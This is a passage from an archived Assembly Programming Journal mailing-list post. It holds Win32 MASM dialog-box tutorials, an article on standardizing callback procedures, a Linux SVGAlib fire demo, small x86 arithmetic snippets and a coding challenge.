control-specific functions are provided for programmer's convenience so he
doesn't have to look up the meanings of wParam and lParam for each message.
Normally, you should use control-specific API calls when they're available
since they make source code maintenance easier. Resort to
SendDlgItemMessage only if no control-specific API calls are available.
The Windows dialog box manager sends some messages to a specialized
callback function called a dialog box procedure which has the following
format:

      DlgProc  proto hDlg:DWORD ,\
                     iMsg:DWORD ,\
                     wParam:DWORD ,\
                     lParam:DWORD

The dialog box procedure is very similar to a window procedure except for
the type of return value which is TRUE/FALSE instead of LRESULT. The
internal dialog box manager inside Windows IS the true window procedure for
the dialog box. It calls our dialog box procedure with some messages that
it received. So the general rule of thumb is that: if our dialog box
procedure processes a message,it MUST return TRUE in eax and if it does not
process the message, it must return FALSE in eax. Note that a dialog box
procedure doesn't pass the messages it does not process to the
DefWindowProc call since it's not a real window procedure.


There are two distinct uses of a dialog box. You can use it as the main
window of your application or use it as an input device. We 'll examine the
first approach in this tutorial.

"Using a dialog box as main window" can be interpreted in two different
senses.

   1. You can use the dialog box template as a class template which you
      register with RegisterClassEx call. In this case, the dialog box
      behaves like a "normal" window: it receives messages via a window
      procedure referred to by lpfnWndProc member of the window class, not
      via a dialog box procedure. The benefit of this approach is that you
      don't have to create child window controls yourself, Windows creates
      them for you when the dialog box is created. Also Windows handles the
      keyboard logic for you such as Tab order etc. Plus you can specify the
      cursor and icon of your window in the window class structure.
      Your program just creates the dialog box without creating any parent
      window. This approach makes a message loop unnecessary since the
      messages are sent directly to the dialog box procedure. You don't even
      have to register a window class!

This tutorial is going to be a long one. I'll present the first approach
followed by the second.

Application
-----------

   ------------------------------------------------------------------------
                                  dialog.asm
   ------------------------------------------------------------------------

.386
.model flat,stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
ClassName db "DLGCLASS",0
MenuName db "MyMenu",0
DlgName db "MyDialog",0
AppName db "Our First Dialog Box",0
TestString db "Wow! I'm in an edit box now",0

.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)

.const
IDC_EDIT        equ 3000
IDC_BUTTON      equ 3001
IDC_EXIT        equ 3002
IDM_GETTEXT     equ 32000
IDM_CLEAR       equ 32001
IDM_EXIT        equ 32002

.code
start:
     invoke GetModuleHandle, NULL
     mov    hInstance,eax
     invoke GetCommandLine
     invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
     invoke ExitProcess,eax

WinMain proc
hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
     LOCAL wc:WNDCLASSEX
     LOCAL msg:MSG
     LOCAL hDlg:HWND
     mov   wc.cbSize,SIZEOF WNDCLASSEX
     mov   wc.style, CS_HREDRAW or CS_VREDRAW
     mov   wc.lpfnWndProc, OFFSET WndProc
     mov   wc.cbClsExtra,NULL
     mov   wc.cbWndExtra,DLGWINDOWEXTRA
     push  hInst
     pop   wc.hInstance
     mov   wc.hbrBackground,COLOR_BTNFACE+1
     mov   wc.lpszMenuName,OFFSET MenuName
     mov   wc.lpszClassName,OFFSET ClassName
     invoke LoadIcon,NULL,IDI_APPLICATION
     mov   wc.hIcon,eax
     mov   wc.hIconSm,eax
     invoke LoadCursor,NULL,IDC_ARROW
     mov   wc.hCursor,eax
     invoke RegisterClassEx, addr wc
     invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL
     mov   hDlg,eax
     invoke ShowWindow, hDlg,SW_SHOWNORMAL
     invoke UpdateWindow, hDlg
     invoke GetDlgItem,hDlg,IDC_EDIT
     invoke SetFocus,eax
     .WHILE TRUE
         invoke GetMessage, ADDR msg,NULL,0,0
         .BREAK .IF (!eax)
        invoke IsDialogMessage, hDlg, ADDR msg
         .IF eax ==FALSE
             invoke TranslateMessage, ADDR msg
             invoke DispatchMessage, ADDR msg
         .ENDIF
     .ENDW
     mov     eax,msg.wParam
     ret
WinMain endp

WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
     .IF uMsg==WM_DESTROY
         invoke PostQuitMessage,NULL
     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0
             .IF ax==IDM_GETTEXT
                 invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
             .ELSEIF ax==IDM_CLEAR
                 invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
             .ELSE
                 invoke DestroyWindow,hWnd
             .ENDIF
         .ELSE
             mov edx,wParam
             shr edx,16
             .IF dx==BN_CLICKED
                 .IF ax==IDC_BUTTON
                     invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
                 .ELSEIF ax==IDC_EXIT
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
                 .ENDIF
             .ENDIF
         .ENDIF
     .ELSE
         invoke DefWindowProc,hWnd,uMsg,wParam,lParam
         ret
     .ENDIF
     xor    eax,eax
     ret
WndProc endp
end start
   ------------------------------------------------------------------------
                                  Dialog.rc
   ------------------------------------------------------------------------

#include "resource.h"

#define IDC_EDIT                                       3000
#define IDC_BUTTON                                3001
#define IDC_EXIT                                       3002

#define IDM_GETTEXT                             32000
#define IDM_CLEAR                                  32001
#define IDM_EXIT                                      32003


MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our First Dialog Box"
CLASS "DLGCLASS"
BEGIN
     EDITTEXT         IDC_EDIT,   15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
     DEFPUSHBUTTON   "Say Hello", IDC_BUTTON,    141,10,52,13
     PUSHBUTTON      "E&xit", IDC_EXIT,  141,26,52,13, WS_GROUP
END


MyMenu  MENU
BEGIN
     POPUP "Test Controls"
     BEGIN
         MENUITEM "Get Text", IDM_GETTEXT
         MENUITEM "Clear Text", IDM_CLEAR
         MENUITEM "", , 0x0800 /*MFT_SEPARATOR*/
         MENUITEM "E&xit", IDM_EXIT
     END
END

Analysis
--------

Let's analyze this first example.
This example shows how to register a dialog template as a window class and
create a "window" from that class. It simplifies your program since you
don't have to create the child window controls yourself.
Let's first analyze the dialog template.

MyDialog DIALOG 10, 10, 205, 60

Declare the name of a dialog, in this case, "MyDialog" followed by the
keyword "DIALOG". The following four numbers are: x, y , width, and height
of the dialog box in dialog box units (not the same as pixels).

STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK

Declare the styles of the dialog box.

CAPTION "Our First Dialog Box"

This is the text that will appear in the dialog box's title bar.

CLASS "DLGCLASS"

This line is crucial. It's this CLASS keyword that allows us to use the
dialog box template as a window class. Following the keyword is the name of
the "window class"

BEGIN
     EDITTEXT         IDC_EDIT,   15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
     DEFPUSHBUTTON   "Say Hello", IDC_BUTTON,    141,10,52,13
     PUSHBUTTON      "E&xit", IDC_EXIT,  141,26,52,13
END

The above block defines the child window controls in the dialog box.
They're defined between BEGIN and END keywords. Generally the syntax is as
follows:

      control-type  "text"   ,controlID, x, y, width, height [,styles]

control-types are resource compiler's constants so you have to consult the
manual.

Now we go to the assembly source code. The interesting part is in the
window class structure:

      mov   wc.cbWndExtra,DLGWINDOWEXTRA
      mov   wc.lpszClassName,OFFSET ClassName

Normally, this member is left NULL, but if we want to register a dialog box
template as a window class, we must set this member to the value
DLGWINDOWEXTRA. Note that the name of the class must be identical to the
one following the CLASS keyword in the dialog box template. The remaining
members are initialized as usual. After you fill the window class
structure, register it with RegisterClassEx. Seems familiar? This is the
same routine you have to do in order to register a normal window class.

      invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL

After registering the "window class", we create our dialog box. In this
example, I create it as a modeless dialog box with CreateDialogParam
function. This function takes 5 parameters but you only have to fill in the
first two: the instance handle and the pointer to the name of the dialog
box template. Note that the 2nd parameter is not a pointer to the class
name.

At this point, the dialog box and its child window controls are created by
Windows. Your window procedure will receive WM_CREATE message as usual.

      invoke GetDlgItem,hDlg,IDC_EDIT
      invoke SetFocus,eax

After the dialog box is created, I want to set the input focus to the edit
control. If I put these codes in WM_CREATE section, GetDlgItem call will
fail since at that time, the child window controls are not created yet. The
only way you can do this is to call it after the dialog box and all its
child window controls are created. So I put these two lines after the
UpdateWindow call. GetDlgItem function gets the control ID and returns the
associated control's window handle. This is how you can get a window handle
if you know its control ID.

        invoke IsDialogMessage, hDlg, ADDR msg
         .IF eax ==FALSE
             invoke TranslateMessage, ADDR msg
             invoke DispatchMessage, ADDR msg
         .ENDIF

The program enters the message loop and before we translate and dispatch
messages, we call IsDialogMessage function to let the dialog box manager
handles the keyboard logic of our dialog box for us. If this function
returns TRUE , it means the message is intended for the dialog box and is
processed by the dialog box manager. Note another difference from the
previous tutorial. When the window procedure wants to get the text from the
edit control, it calls GetDlgItemText function instead of GetWindowText.
GetDlgItemText accepts a control ID instead of a window handle. That makes
the call easier in the case you use a dialog box.
   ------------------------------------------------------------------------

Now let's go to the second approach to using a dialog box as a main window.
In the next example, I 'll create an application modal dialog box. You'll
not find a message loop or a window procedure because they're not
necessary!
   ------------------------------------------------------------------------
                             dialog.asm (part 2)
   ------------------------------------------------------------------------

.386
.model flat,stdcall
option casemap:none

DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
DlgName db "MyDialog",0
AppName db "Our Second Dialog Box",0
TestString db "Wow! I'm in an edit box now",0

.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)

.const
IDC_EDIT            equ 3000
IDC_BUTTON     equ 3001
IDC_EXIT            equ 3002
IDM_GETTEXT  equ 32000
IDM_CLEAR       equ 32001
IDM_EXIT           equ 32002


.code
start:
     invoke GetModuleHandle, NULL
     mov    hInstance,eax
     invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL

     invoke ExitProcess,eax

DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
     .IF uMsg==WM_INITDIALOG
         invoke GetDlgItem, hWnd,IDC_EDIT
         invoke SetFocus,eax
     .ELSEIF uMsg==WM_CLOSE
         invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
     .ELSEIF uMsg==WM_COMMAND
         mov eax,wParam
         .IF lParam==0
             .IF ax==IDM_GETTEXT
                 invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
                 invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
             .ELSEIF ax==IDM_CLEAR
                 invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
             .ELSEIF ax==IDM_EXIT
                 invoke EndDialog, hWnd,NULL
             .ENDIF
         .ELSE
             mov edx,wParam
             shr edx,16
             .if dx==BN_CLICKED
                 .IF ax==IDC_BUTTON
                     invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
                 .ELSEIF ax==IDC_EXIT
                     invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
                 .ENDIF
             .ENDIF
         .ENDIF
     .ELSE
         mov eax,FALSE
         ret
     .ENDIF
     mov eax,TRUE
     ret
DlgProc endp
end start
   ------------------------------------------------------------------------
                              dialog.rc (part 2)
   ------------------------------------------------------------------------

#include "resource.h"

#define IDC_EDIT                                       3000
#define IDC_BUTTON                                3001
#define IDC_EXIT                                       3002

#define IDR_MENU1                                  3003

#define IDM_GETTEXT                              32000
#define IDM_CLEAR                                   32001
#define IDM_EXIT                                       32003


MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our Second Dialog Box"
MENU IDR_MENU1
BEGIN
     EDITTEXT         IDC_EDIT,   15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
     DEFPUSHBUTTON   "Say Hello", IDC_BUTTON,    141,10,52,13
     PUSHBUTTON      "E&xit", IDC_EXIT,  141,26,52,13
END


IDR_MENU1  MENU
BEGIN
     POPUP "Test Controls"
     BEGIN
         MENUITEM "Get Text", IDM_GETTEXT
         MENUITEM "Clear Text", IDM_CLEAR
         MENUITEM "", , 0x0800 /*MFT_SEPARATOR*/
         MENUITEM "E&xit", IDM_EXIT
     END
END

   ------------------------------------------------------------------------

The analysis follows:

     DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD

We declare the function prototype for DlgProc so we can refer to it with
addr operator in the line below:

     invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL

The above line calls DialogBoxParam function which takes 5 parameters: the
instance handle, the name of the dialog box template, the parent window
handle, the address of the dialog box procedure, and the dialog-specific
data. DialogBoxParam creates a modal dialog box. It will not return until
the dialog box is destroyed.

     .IF uMsg==WM_INITDIALOG
         invoke GetDlgItem, hWnd,IDC_EDIT
         invoke SetFocus,eax
     .ELSEIF uMsg==WM_CLOSE
         invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0

The dialog box procedure looks like a window procedure except that it
doesn't receive WM_CREATE message. The first message it receives is
WM_INITDIALOG. Normally you can put the initialization code here. Note that
you must return the value TRUE in eax if you process the message.
The internal dialog box manager doesn't send our dialog box procedure the
WM_DESTROY message by default when WM_CLOSE is sent to our dialog box. So
if we want to react when the user presses the close button on our dialog
box, we must process WM_CLOSE message. In our example, we send WM_COMMAND
message with the value IDM_EXIT in wParam. This has the same effect as when
the user selects Exit menu item. EndDialog is called in response to
IDM_EXIT.

The processing of WM_COMMAND messages remains the same.
When you want to destroy the dialog box, the only way is to call EndDialog
function. Do not try DestroyWindow! EndDialog doesn't destroy the dialog
box immediately. It only sets a flag for the internal dialog box manager
and continues to execute the next instructions.

Now let's examine the resource file. The notable change is that instead of
using a text string as menu name we use a value, IDR_MENU1. This is
necessary if you want to attach a menu to a dialog box created with
DialogBoxParam. Note that in the dialog box template, you have to add the
keyword MENU followed by the menu resource ID.

A difference between the two examples in this tutorial that you can readily
observe is the lack of an icon in the latter example. However, you can set
the icon by sending the message WM_SETICON to the dialog box during
WM_INITDIALOG.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                         Standardizing Win32 Callback Procedures
                                         by Jeremy Gordon


This short article describes my preferred method for coding CALLBACK procedures
in a large assembler program for Windows 32.  First I describe what Win32
callback procedures are, and then get down to some code.

At run time the Win32 system will call your program on a regular and frequent
basis.  The procedures you supply for the system to call are called CALLBACK
procedures.  Here are examples of when these are used:-
1. To manage a window you created.  In this case the system will send many
    messages to the Window Procedure for the window.  The Window Procedure is
    the code label you provide when you register your window class (by calling
    RegisterClass).  For example the message WM_SIZE is sent by the system
    when the window is resized.
2. To inform the owner of a child window of events in the child window.  For
    example WM_PARENTNOTIFY (with a notify code) is sent to the Window
    Procedure of the owner of a window when the child window is being created
    or destroyed, or if the user clicks a mouse button while the cursor is
    over the child window.
3. To inform the owner of a common control of events in the control.  For
    example if you create a button owned by your window the Window Procedure
    for that window receives BN_CLICKED messages if the button is clicked.
4. Messages sent to a dialog you have created.  These are messages relating
    to the creation of the dialog and of the various controls.  The dialog
    procedure is informed of events in the controls.
5. If you "Superclass" or "Subclass" a common control, you receive messages
    for that common control like a hook procedure but your window procedure
    has the responsibility of passing them on to the control.
6. If you create "Hook" procedures you can intercept messages about to be sent
    to other windows.  The system will call your hook procedure and will pass
    the message on only when your hook procedure returns.
7. You can ask the system to provide your program with information to be sent
    to a CALLBACK procedure.  Examples are EnumWindows (enumerate all top-level
    windows) or EnumFonts (enumerate all available fonts).

In cases 1 to 5 above, just before the system calls the CALLBACK procedure,
it PUSHES 4 dwords on the stack (ie. 4 "parameters").  Traditionally the
names given to these parameters are:-
        hWnd = handle of window being called
        uMsg = message number
        wParam = a parameter sent with the message
        lParam = another parameter sent with the message.

The number of parameters sent to hook procedures and emumeration
callbacks varies - see the Window SDK.

Since your Window (or Dialog) procedure will need to react in a certain
way depending on the message being sent, your code will need to divert
execution to the correct place for a particular message.

"C" programmers have the advantage of being able to code this simply,
using "switch" and "case".

Assembler programmers use various techniques.  Perhaps the worst if there are
a lot of messages to handle is the chain of compares, eg. (in A386 format):-
        MOV EAX,[EBP+0Ch]        ;get message number
        CMP EAX,1h               ;see if WM_CREATE
        JNZ >L2                  ;no
        XOR EAX,EAX              ;ensure eax is zero on exit
        JMP >L32                 ;finish
        L2:
        CMP EAX,116h             ;see if WM_INITMENU
        JNZ >L4                  ;no
        CALL INITIALISE_MENU
        JMP >L30                 ;correct exit code
        L4:
        CMP EAX,47h              ;see if WM_WINDOWPOSCHANGED
        JNZ >L8
        and so on ........

To avoid these long chains, assembler programmers have developed various
techniques.  You will have seen many of these in sample code around Win32
assembler web sites and in the asm journal, using conditional jumps, macros
or table scans.  I do not wish to compare these various methods, merely to put
forward my own current favourite, which I believe has these advantages:-
1. It works on all assemblers
2. It is modular, ie. the code for each window can be concentrated in a
    particular part of your source code
3. It is easy to follow from the source code what message causes what result
4. The same function can easily be called from within different window
    procedures

My method results in a very simple Window Procedure as follows (A386 format):-

        WndProc:
        MOV EDX,OFFSET MAINMESSAGES
        CALL GENERAL_WNDPROC
        RET 10h

where the messages and functions (specific to this particular window
procedure) are set out in a table such as this:-

;----------------------------------------------------------
DATA SEGMENT FLAT             ;assembler to put following in data section
;--------------------------- WNDPROC message functions
MAINMESSAGES DD ENDOF_MAINMESSAGES-$                ;=number to be done
        DD  312h,HOTKEY,116h,INITMENU,117h,INITMENUPOPUP,11Fh,MENUSELECT
        DD  1h,CREATE,2h,DESTROY, 410h,OWN410,411h,OWN411
        DD  231h,ENTERSIZEMOVE,47h,WINDOWPOSCHANGED,24h,GETMINMAXINFO
        DD  1Ah,SETTINGCHANGE,214h,SIZING,46h,WINDOWPOSCHANGING
        DD  2Bh,DRAWITEM,0Fh,PAINT,113h,TIMER,111h,COMMAND
        DD  104h,SYSKEYDOWN,100h,KEYDOWN,112h,SYSCOMMAND
        DD  201h,LBUTTONDOWN,202h,LBUTTONUP,115h,SCROLLMESS
        DD  204h,RBUTTONDOWNUP,205h,RBUTTONDOWNUP
        DD  200h,MOUSEMOVE,0A0h,NCMOUSEMOVE,20h,SETCURSORM
        DD  4Eh,NOTIFY,210h,PARENTNOTIFY,86h,NCACTIVATE,6h,ACTIVATE
        DD  1Ch,ACTIVATEAPP
ENDOF_MAINMESSAGES:           ;label used to work out how many messages
;----------------------------------------------------------
_TEXT SEGMENT FLAT            ;assembler to put following in code section
;----------------------------------------------------------

and where each of the functions here are procedures, for example:-

        CREATE:
        XOR EAX,EAX             ;ensure zero and nc return
        RET

and where GENERAL_WINDPROC is as follows:-

        GENERAL_WNDPROC:
        PUSH EBP
        MOV EBP,[ESP+10h]       ;get uMsg in ebp
        MOV ECX,[EDX]           ;get number of messages to do * 8 (+4)
        SHR ECX,3               ;get number of messages to do
        ADD EDX,4               ;jump over size dword
        L33:
        DEC ECX
        JS >L46                 ;s=message not found
        CMP [EDX+ECX*8],EBP     ;see if its the correct message
        JNZ L33                 ;no
        MOV EBP,ESP
        PUSH ESP,EBX,EDI,ESI    ;save registers as required by Windows
        ADD EBP,4               ;allow for the extra call to here
        ;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
        CALL [EDX+ECX*8+4]      ;call correct procedure for the message
        POP ESI,EDI,EBX,ESP
        JNC >L48                ;nc=don't call DefWindowProc eax=exit code
        L46:
        PUSH [ESP+18h],[ESP+18h],[ESP+18h],[ESP+18h]  ;ESP changes on push
        CALL DefWindowProcA
        L48:
        POP EBP
        RET


NOTES:
-------------------------------------------------------------------------------
1. Instead of giving the actual message value, you can, of course, give
    the name of an EQUATE.  For example
            WM_CREATE EQU 1h
    enables you to use WM_CREATE,CREATE instead of 1h,CREATE if you wish.
2. It is tempting to keep the message table in the CODE SECTION.  This is
    perfectly possible because the only difference to the Win32 system between
    the code section and the data section is that the code section area of
    memory is marked read only, whereas the data section is read/write.
    However, you may well get some loss of performance if you do this because
    most processors will read data more quickly from the data section.
    I performed some tests on this and found that having the table in the code
    section rather than the data section could slow the code considerably:-
          486 processor - 22% to 36% slower
          Pentium processor - 94% to 161% slower
          AMD-K6-3D processor - 78% to 193% slower
          (but Pentium Pro - from 7% faster to 9% slower)
          (and Pentium II - from 29% faster to 5% slower)
    These tests were carried out on a table of 60 messages and the range of
    results is because tests were carried out varying the number of scans
    required before a find and also testing a no-find.
3. The procedure names must not be the names of API imports to avoid
    confusion!  For example change SETCURSOR slightly to avoid confusion
    with the API SetCursor.
4. If a function returns c (carry flag set) the window procedure will call
    DefWindowProc.  An nc return (carry flag not set) will merely return to
    the system with the return code in eax.  (Some messages must be dealt with
    in this way).
5. You can send a parameter of your own to GENERAL_WNDPROC using EAX.
    This is useful if you wish to identify a particular window.
    For example:-
        SpecialWndProc:
        MOV EAX,OFFSET hSpecialWnd
        MOV EDX,OFFSET SPECIALWND_MESSAGES
        CALL GENERAL_WNDPROC
        RET 10h
6. The ADD EBP,4 just before the call to the function is to ensure that
    EBP points to the parameters the stack in the same way as if the window
    procedure had been entered normally.  This is intended to ensure that
    the function will be compatible if called by an ordinary window procedure
    written in assembler, for example:-
        WndProc:
        PUSH EBP
        MOV EBP,ESP
        ;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
7. A standardized procedure for dealing with messages to a dialog procedure
    can also be created in the same way, except that it should return TRUE
    (eax=1) if the message is processed and FALSE (eax=0) if it is not, without
    calling DefWindowProc. The same coding method can be applied to hooks and
    to enumerator CALLBACKS although these will vary.

                              jorgon@...
                 http://ourworld.compuserve.com/homepages/jorgon



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                               Fire Demo ported to Linux SVGAlib
                                               by Jan Wagemakers


  In APJ4 there was a little nice fire demo written in DOS assembly language.
  I have ported this program to Linux assembly language. It is written in the
  AT&T-syntax (GNU assembler) and makes use of SVGAlib.

  My main goal of porting this program to Linux was to show that it can be
  done. So, I have not optimized this program. For example, things like 'call
  ioperm' can also be done by making use of int 0x80; quite possibly making use
  of int 0x80 will make the program smaller. More information about int 0x80 is
  available at Konstantin Boldyshev's webpage [http://lightning.voshod.com/asm].

  With SVGALib you can access the screen memory directly, just like you
  would write to A000:0000 in a DOS asm-program.

  I like to thank 'paranoya' for his explanation about how to make use of
  SVGAlib. Anyway, enough blablabla, here is the source ;-)

# fire.s : fire.asm of apj 4 ported to Linux/SVGAlib ==========================
# gcc -o fire fire.s -lvga
  .globl main
         .type    main,@function
main:
         pushl %ebp
         movl %esp,%ebp

         call vga_init           # Init vga
         pushl $5
         call vga_setmode        # set mode to 5 = 320x200x256
         addl $4,%esp
         pushl $0
         call vga_setpage        # Point to page 0 (There is only 1 page)
         addl $4,%esp

         pushl $0x3c8            # Get IOpermission, starting from 3c8h
         pushl $2                # to 3c9h
         pushl $1                # Turn On value
         call ioperm
         addl $12,%esp

         pushl $0x60             # Get IOpermission, for 60h : keyboard
         pushl $1
         Pushl $1
         call ioperm
         addl $12,%esp

         inb $0x60,%al           # Read current value of keyboard
         movb %al,key

         movw $0x3c8,%dx
         movw $0,%ax
         outb %al,%dx
         incw %dx
lus:
         outb %al,%dx
         outb %al,%dx
         outb %al,%dx
         incw %ax
         jnz lus

         movl graph_mem,%ebx

Mainloop:
         movl $1280,%esi         # mov si,1280 ;
         movl $0x5d00,%ecx       # mov ch,5dh  ; y-pos, the less the faster demo
         pushl %esi              # push    si
         pushl %ecx              # push    cx
Sloop:
         movb (%ebx,%esi),%al    # lodsb
         incl %esi               #


         addb (%ebx,%esi),%al    # al,[si]                 ; pick color and
         addb 320(%ebx,%esi),%al # add     al,[si+320]     ; pick one more and
         shrb $2,%al             # shr     al,2

         movb %al,-960(%ebx,%esi) # mov     [si-960],al     ; put color

         loop Sloop

         popl %edi               # pop di
         popl %ecx               # pop cx

Randoml:
         mulw 1(%ebx,%edi)       # mul     word ptr [di+1] ; 'random' routine.
         incw %ax
         movw %ax,(%ebx,%edi)    #stosw
         incl %edi
         incl %edi
         loop Randoml

         inb $0x60,%al
         cmpb key,%al
         jz Mainloop

         pushl $0
         call exit
         addl $4,%esp

         movl %ebp,%esp
         popl %ebp
         ret

.data
key:
         .byte   0
# =============================================================================



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
							        Abs
							        by Chris Dragan

;Summary:       Calculates absolute value of a signed integer in eax.
;Compatibility: 386+
;Notes:  9 bytes, 4 clocks (P5), destroys ecx
	 mov ecx, eax ; Duplicate value
	 shr ecx, 31  ; Fill ecx with its sign
	 xor eax, ecx ; Do 'not eax' if negative
	 sub eax, ecx ; Do 'inc eax' if negative

; For comparison, the standard way (2-8 clocks on P5 and 1-17 on P6):
;        or      eax, eax
;        js      @@1
;        neg     eax
;@@1:

							        Min
							        by Chris Dragan

;Summary:       eax = min (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes:  8 bytes, 4 clocks (P5), destroys ecx and edx
	 sub ecx, eax ; ecx = n2 - n1
	 sbb edx, edx ; edx = (n1 > n2) ? -1 : 0
	 and ecx, edx ; ecx = (n1 > n2) ? (n2 - n1) : 0
	 add eax, ecx ; eax += (n1 > n2) ? (n2 - n1) : 0
; Standard cmp/jbe/mov takes 2-8 clocks on P5 and 1-17 on P6

							        Max
							        by Chris Dragan

;Summary:       eax = max (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes:  9 bytes, 5 clocks (P5), destroys ecx and edx
	 sub ecx, eax ; ecx = n2 - n1
	 cmc 	 ; cf = n1 <= n2
	 sbb edx, edx ; edx = (n1 > n2) ? 0 : -1
	 and ecx, edx ; ecx = (n1 > n2) ? 0 : (n2 - n1)
	 add eax, ecx ; eax += (n1 > n2) ? 0 : (n2 - n1)
; Standard cmp/jae/mov takes 2-8 clocks on P5 and 1-17 on P6

                                                                     OBJECT
                                                                     by mammon_
;Summary:       Primitive for defining dynamic objects
;Compatibility: NASM
;Notes:         The basic building block for classes in NASM; part of
;               an ongoing project of mine. Note that .this can be
;               filled with the instance pointer, and additional
;               routines such as .%1 [constructor] and .~  can be added.
         %macro OBJECT 1
                 struc %1
                  .this:       resd 1
         %endmacro
         %macro END_OBJECT 0
                 endstruc
         %endmacro

     ;_Sample:________________________________________________________________
     ;OBJECT MSGBOX
     ;  .hWnd:        resd 1
     ;  .lpText:      resd 1
     ;  .lpCapt:      resd 1
     ;  .uInt:        resd 1
     ;  .show:        resd 1
     ;END_OBJECT
     ;;MyMBox is a pointer to a location in memory or in an istruc; its members
     ;;are filled in an init routine ['new'] with "show" being "DD _show"
     ;_show:             ;MSGBOX class display routine
     ;        push dword [MyMbox + MSGBOX.uInt]
     ;        push dword [MyMbox + MSGBOX.lpCapt]
     ;        push dword [MyMbox + MSGBOX.lpText]
     ;        push dword [MyMbox + MSGBOX.hWnd]
     ;        call MessageBoxA
     ;        ret
     ;..start:
     ;        call [MyMbox + MSGBOX.show]
     ;        ret



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                                 Binary-to-ASCII
                                                                by Jan Verhoeven


The Challenge
-------------
Write a routine to convert the value of a bit to ASCII in under 10 bytes, with
no conditional jumps.

The Solution
------------
Load the number into the AX register and shift through the bits. If a bit is
cleared [0], you want to print a "0" character; if a bit is set [1], you want
to print a "1".

Prime the BL register with the ASCII character "0"; if the next bit in AX is
set, carry will be set after the SHL and BL will thus be incremented to an
ASCII "1". The key, as you will see, is the ADC [AddWithCarry] instruction:

L0: B330          MOV     BL,30   ; try with al = ZERO
     D1E0          SHL     AX,1    ; ... but if bit = set, ...
     80D300        ADC     BL,00   ; ... make it a ONE,

7 bytes all told; with a loop and mov instruction for storing each value in
BL to the location of your choice, you will have a full-fledged binary-to-
ascii converter in a handful of bytes.




::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#12 From: "Michael Mondragon" <mammon_@...>
Date: Fri Sep 17, 1999 1:14 am
Subject: APJ Issue#4 Apr-June 99
mammon_@...
Send Email Send Email
 
______________________________________________________
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                               Apr-June  99
:::\_____\::::::::::.                                              Issue      4
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Using COM in Assembly Language"..........................Lord.Lucifer

"Stack Frames and High-Level Calls"............................mammon_

"Define Your Memory".......................................Alan Baylis

